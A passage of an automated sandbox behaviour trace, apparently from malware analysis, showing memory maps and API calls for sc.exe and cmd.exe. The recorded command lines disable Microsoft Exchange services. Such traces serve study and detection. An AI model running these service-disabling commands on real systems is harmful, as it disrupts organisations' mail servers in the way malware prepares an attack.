0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 7479 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7480 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7481 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7482 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7483 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7484 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7485 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7486 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7487 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 468 os_tid = 0xf80 Thread: id = 469 os_tid = 0xf74 Thread: id = 470 os_tid = 0xf7c Process: id = "136" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x35a88000" os_pid = "0xf68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "134" os_parent_pid = "0x960" cmd_line = "sc config MSExchangeIS start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7501 start_va = 0x190000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 7502 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 7503 start_va = 0x1c0000 end_va = 0x1d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 7504 start_va = 0x1e0000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 7505 start_va = 0x220000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 7506 start_va = 0x260000 end_va = 0x263fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 7507 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 7508 start_va = 0x280000 end_va = 0x281fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 7509 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 7510 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 7511 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7512 start_va = 0x7edf0000 end_va = 0x7ee12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007edf0000" filename = "" Region: id = 7513 start_va = 0x7ee1b000 end_va = 0x7ee1dfff entry_point = 0x0 region_type = private name = "private_0x000000007ee1b000" filename = "" Region: id = 7514 start_va = 0x7ee1e000 end_va = 0x7ee1efff entry_point = 0x0 region_type = private name = "private_0x000000007ee1e000" filename = "" Region: id = 7515 start_va = 0x7ee1f000 end_va = 0x7ee1ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee1f000" filename = "" Region: id = 7516 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7517 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7518 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 7519 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7520 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 7521 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 7522 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7523 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7524 start_va = 0x490000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 7525 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7526 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 7527 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 7528 start_va = 0x290000 end_va = 0x34dfff entry_point = 0x290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7529 start_va = 0x390000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 7530 start_va = 0x3d0000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 7531 start_va = 0x680000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 7532 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7533 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7534 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7535 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7536 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7537 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7538 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7539 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7540 start_va = 0x7ecf0000 end_va = 0x7edeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ecf0000" filename = "" Region: id = 7541 start_va = 0x7ee18000 end_va = 0x7ee1afff entry_point = 0x0 region_type = private name = "private_0x000000007ee18000" filename = "" Region: id = 7542 start_va = 0x590000 end_va = 0x66efff entry_point = 0x590000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 7543 start_va = 0x350000 end_va = 0x361fff entry_point = 0x350000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 472 os_tid = 0xf70 [0130.773] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0130.773] __set_app_type (_Type=0x1) [0130.773] __p__fmode () returned 0x77ac4d6c [0130.773] __p__commode () returned 0x77ac5b1c [0130.773] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0130.773] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0130.774] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.776] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.776] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0130.776] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0130.776] _wcsicmp (_String1="config", _String2="query") returned -14 [0130.776] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0130.776] _wcsicmp (_String1="config", _String2="start") returned -16 [0130.776] _wcsicmp (_String1="config", _String2="pause") returned -13 [0130.776] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0130.776] _wcsicmp (_String1="config", _String2="control") returned -14 [0130.776] _wcsicmp (_String1="config", _String2="continue") returned -14 [0130.776] _wcsicmp (_String1="config", _String2="stop") returned -16 [0130.776] _wcsicmp (_String1="config", _String2="config") returned 0 [0130.776] ResolveDelayLoadedAPI () returned 0x77262c10 [0130.776] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x498530 [0130.778] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0130.778] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0130.778] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0130.778] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0130.778] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0130.778] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0130.778] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0130.778] OpenServiceW (hSCManager=0x498530, lpServiceName="MSExchangeIS", dwDesiredAccess=0x3) returned 0x0 [0130.778] GetLastError () returned 0x424 [0130.778] _ultow (in: _Dest=0x424, _Radix=2488756 | out: _Dest=0x424) returned="1060" [0130.778] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0130.779] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x25f990, nSize=0x2, Arguments=0x25f9a8 | out: lpBuffer="裀I類%蔔è") returned 0x62 [0130.780] GetFileType (hFile=0x3c) returned 0x2 [0130.780] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x25f974 | out: lpMode=0x25f974) returned 1 [0130.780] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x4988c0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x25f984, lpReserved=0x0 | out: lpBuffer=0x4988c0*, lpNumberOfCharsWritten=0x25f984*=0x62) returned 1 [0130.780] LocalFree (hMem=0x4988c0) returned 0x0 [0130.780] LocalFree (hMem=0x0) returned 0x0 [0130.780] CloseServiceHandle (hSCObject=0x498530) returned 1 [0130.781] LocalFree (hMem=0x0) returned 0x0 [0130.781] exit (_Code=1060) Thread: id = 473 os_tid = 0xf58 Process: id = "137" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x67e56000" os_pid = "0xf6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeMailSubmission start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7544 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 7545 start_va = 0x630000 end_va = 0x462ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 7546 start_va = 0x4630000 end_va = 0x464ffff entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 7547 start_va = 0x4650000 end_va = 0x4651fff entry_point = 0x0 region_type = private name = "private_0x0000000004650000" filename = "" Region: id = 7548 start_va = 0x4660000 end_va = 0x4673fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004660000" filename = "" Region: id = 7549 start_va = 0x4680000 end_va = 0x46bffff entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 7550 start_va = 0x46c0000 end_va = 0x47bffff entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 7551 start_va = 0x47c0000 end_va = 0x47c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047c0000" filename = "" Region: id = 7552 start_va = 0x47d0000 end_va = 0x47d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047d0000" filename = "" Region: id = 7553 start_va = 0x47e0000 end_va = 0x47e1fff entry_point = 0x0 region_type = private name = "private_0x00000000047e0000" filename = "" Region: id = 7554 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7555 start_va = 0x7f660000 end_va = 0x7f682fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f660000" filename = "" Region: id = 7556 start_va = 0x7f683000 end_va = 0x7f683fff entry_point = 0x0 region_type = private name = "private_0x000000007f683000" filename = "" Region: id = 7557 start_va = 0x7f68c000 end_va = 0x7f68efff entry_point = 0x0 region_type = private name = "private_0x000000007f68c000" filename = "" Region: id = 7558 start_va = 0x7f68f000 end_va = 0x7f68ffff entry_point = 0x0 region_type = private name = "private_0x000000007f68f000" filename = "" Region: id = 7559 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7560 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7561 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 7562 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7563 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 7564 start_va = 0x4910000 end_va = 0x491ffff entry_point = 0x0 region_type = private name = "private_0x0000000004910000" filename = "" Region: id = 7565 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7566 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7567 start_va = 0x4a20000 end_va = 0x4b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a20000" filename = "" Region: id = 7568 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7609 start_va = 0x4630000 end_va = 0x463ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004630000" filename = "" Region: id = 7610 start_va = 0x47f0000 end_va = 0x48adfff entry_point = 0x47f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7611 start_va = 0x48b0000 end_va = 0x48effff entry_point = 0x0 region_type = private name = "private_0x00000000048b0000" filename = "" Region: id = 7612 start_va = 0x4920000 end_va = 0x4a1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004920000" filename = "" Region: id = 7613 start_va = 0x4ba0000 end_va = 0x4baffff entry_point = 0x0 region_type = private name = "private_0x0000000004ba0000" filename = "" Region: id = 7614 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7615 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7616 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7617 start_va = 0x7f560000 end_va = 0x7f65ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f560000" filename = "" Region: id = 7618 start_va = 0x7f689000 end_va = 0x7f68bfff entry_point = 0x0 region_type = private name = "private_0x000000007f689000" filename = "" Region: id = 7619 start_va = 0x4640000 end_va = 0x4643fff entry_point = 0x0 region_type = private name = "private_0x0000000004640000" filename = "" Region: id = 7620 start_va = 0x4650000 end_va = 0x4653fff entry_point = 0x0 region_type = private name = "private_0x0000000004650000" filename = "" Region: id = 7621 start_va = 0x4bb0000 end_va = 0x4ee6fff entry_point = 0x4bb0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 474 os_tid = 0xf54 [0130.939] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0130.939] __set_app_type (_Type=0x1) [0130.939] __p__fmode () returned 0x77ac4d6c [0130.939] __p__commode () returned 0x77ac5b1c [0130.939] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0130.939] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0130.939] GetCurrentThreadId () returned 0xf54 [0130.939] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf54) returned 0x84 [0130.940] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0130.940] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0130.940] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.942] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.943] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x47bf870 | out: phkResult=0x47bf870*=0x0) returned 0x2 [0130.943] VirtualQuery (in: lpAddress=0x47bf877, lpBuffer=0x47bf828, dwLength=0x1c | out: lpBuffer=0x47bf828*(BaseAddress=0x47bf000, AllocationBase=0x46c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.943] VirtualQuery (in: lpAddress=0x46c0000, lpBuffer=0x47bf828, dwLength=0x1c | out: lpBuffer=0x47bf828*(BaseAddress=0x46c0000, AllocationBase=0x46c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0130.943] VirtualQuery (in: lpAddress=0x46c1000, lpBuffer=0x47bf828, dwLength=0x1c | out: lpBuffer=0x47bf828*(BaseAddress=0x46c1000, AllocationBase=0x46c0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0130.943] VirtualQuery (in: lpAddress=0x46c3000, lpBuffer=0x47bf828, dwLength=0x1c | out: lpBuffer=0x47bf828*(BaseAddress=0x46c3000, AllocationBase=0x46c0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.943] VirtualQuery (in: lpAddress=0x47c0000, lpBuffer=0x47bf828, dwLength=0x1c | out: lpBuffer=0x47bf828*(BaseAddress=0x47c0000, AllocationBase=0x47c0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0130.943] GetConsoleOutputCP () returned 0x1b5 [0130.943] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0130.943] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0130.943] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.943] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0130.943] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.943] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0130.944] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.944] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0130.944] _get_osfhandle (_FileHandle=0) returned 0x38 [0130.944] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0130.944] _get_osfhandle (_FileHandle=0) returned 0x38 [0130.944] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0130.944] GetEnvironmentStringsW () returned 0x4a27db0* [0130.944] FreeEnvironmentStringsA (penv="A") returned 1 [0130.944] GetEnvironmentStringsW () returned 0x4a27db0* [0130.945] FreeEnvironmentStringsA (penv="A") returned 1 [0130.945] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x47be7d4 | out: phkResult=0x47be7d4*=0x94) returned 0x0 [0130.945] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x47be7d8, lpData=0x47be7e0, lpcbData=0x47be7dc*=0x1000 | out: lpType=0x47be7d8*=0x0, lpData=0x47be7e0*=0x0, lpcbData=0x47be7dc*=0x1000) returned 0x2 [0130.945] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x47be7d8, lpData=0x47be7e0, lpcbData=0x47be7dc*=0x1000 | out: lpType=0x47be7d8*=0x4, lpData=0x47be7e0*=0x1, lpcbData=0x47be7dc*=0x4) returned 0x0 [0130.945] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x47be7d8, lpData=0x47be7e0, lpcbData=0x47be7dc*=0x1000 | out: lpType=0x47be7d8*=0x0, lpData=0x47be7e0*=0x1, lpcbData=0x47be7dc*=0x1000) returned 0x2 [0130.945] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x47be7d8, lpData=0x47be7e0, lpcbData=0x47be7dc*=0x1000 | out: lpType=0x47be7d8*=0x4, lpData=0x47be7e0*=0x0, lpcbData=0x47be7dc*=0x4) returned 0x0 [0130.945] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x47be7d8, lpData=0x47be7e0, lpcbData=0x47be7dc*=0x1000 | out: lpType=0x47be7d8*=0x4, lpData=0x47be7e0*=0x40, lpcbData=0x47be7dc*=0x4) returned 0x0 [0130.945] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x47be7d8, lpData=0x47be7e0, lpcbData=0x47be7dc*=0x1000 | out: lpType=0x47be7d8*=0x4, lpData=0x47be7e0*=0x40, lpcbData=0x47be7dc*=0x4) returned 0x0 [0130.945] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x47be7d8, lpData=0x47be7e0, lpcbData=0x47be7dc*=0x1000 | out: lpType=0x47be7d8*=0x0, lpData=0x47be7e0*=0x40, lpcbData=0x47be7dc*=0x1000) returned 0x2 [0130.945] RegCloseKey (hKey=0x94) returned 0x0 [0130.945] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x47be7d4 | out: phkResult=0x47be7d4*=0x94) returned 0x0 [0130.945] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x47be7d8, lpData=0x47be7e0, lpcbData=0x47be7dc*=0x1000 | out: lpType=0x47be7d8*=0x0, lpData=0x47be7e0*=0x40, lpcbData=0x47be7dc*=0x1000) returned 0x2 [0130.945] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, 